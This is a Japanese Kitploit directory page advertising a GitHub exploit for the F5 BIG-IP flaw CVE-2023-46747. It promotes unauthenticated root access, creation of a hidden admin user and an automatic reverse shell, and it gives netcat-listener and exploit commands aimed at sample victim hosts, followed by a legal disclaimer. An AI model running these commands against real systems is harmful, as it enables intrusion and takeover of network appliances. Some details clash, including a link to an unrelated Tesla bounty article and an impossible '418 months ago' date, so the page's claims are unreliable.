Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit — #F5-BIG-IP-CVE-2023-46747-Exploit – 未認証RCE RaguramanによるPythonエクスプロイト&Nucleiテンプレート ✓ 自動TCPリバースシェル(LHOST/LPORT) ✓ 影響を受けるBIG-IP 13.x–17.xでテスト済み ⚠️ 許可されたペンテストのみ | Kitploit
ツール/GitHub
GitHub
/razzlemouse
/f5-big-ip-smuggleshell-cve-2023-46747-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubrazzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit

F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit

#F5-BIG-IP-CVE-2023-46747-Exploit – 未認証RCE RaguramanによるPythonエクスプロイト&Nucleiテンプレート ✓ 自動TCPリバースシェル(LHOST/LPORT) ✓ 影響を受けるBIG-IP 13.x–17.xでテスト済み ⚠️ 許可されたペンテストのみ

リポジトリを見る
418ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

F5 BIG-IP CVE-2023-46747 – 認証なしRCE + リバースシェル

Python3 & Nuclei バージョン – raguraman 作

AJP + HTTPリクエストスモグリングを介した重大な認証なしRCE (CVSS 9.8)
未パッチのすべてのBIG-IP 13.x → 17.x (最新の17.1.0.3を含む) で動作
パッチ: https://my.f5.com/manage/s/article/K000137353 (2023年11月)

実環境でのエクスプロイト解説: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd

特徴

  • 完全自動化 (手動ステップなし)
  • ドメイン名または生のIPアドレスで動作
  • 隠し管理者ユーザーを作成
  • 即時のTCPリバースシェル (root)
  • 認証情報とトークンを含むクリーンな出力

ファイル

  • f5-bigip-cve-2023-46747-revshell.py → スタンドアロンのPython3 (推奨)
  • CVE-2023-46747-revshell.yaml → Nucleiテンプレート (任意)

使用方法 – Python3 (最速かつ最も信頼性が高い)

root@kitploit:~
# 1. リスナーを起動
nc -lvnp 4444

# 2. エクスプロイトを実行 (IPまたはドメインで動作)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50   YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444

# → 即座にrootシェル!

使用法 – Nuclei テンプレート (代替)
Bash # 1. YAMLファイル内のLHOSTとLPORTを編集
# 2. リスナーを起動
nc -lvnp 4444

# 3. スキャン
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com



# 法的警告

このツールは、以下のような認可されたセキュリティテスト専用に意図されています。

承認されたペネトレーションテスト業務

書面による許可を得たレッドチーム運用

管理された実験室環境での研究

このエクスプロイトを、所有していない、またはテストする明示的な許可がないシステムに使用しないでください。
無断使用は違法であり、刑事訴追につながる可能性があります。

このツールを使用することで、適用される法律の遵守に対してすべての責任を負うことになります。
作者は、誤用または損害について一切の責任を負いません。
ツールをダウンロード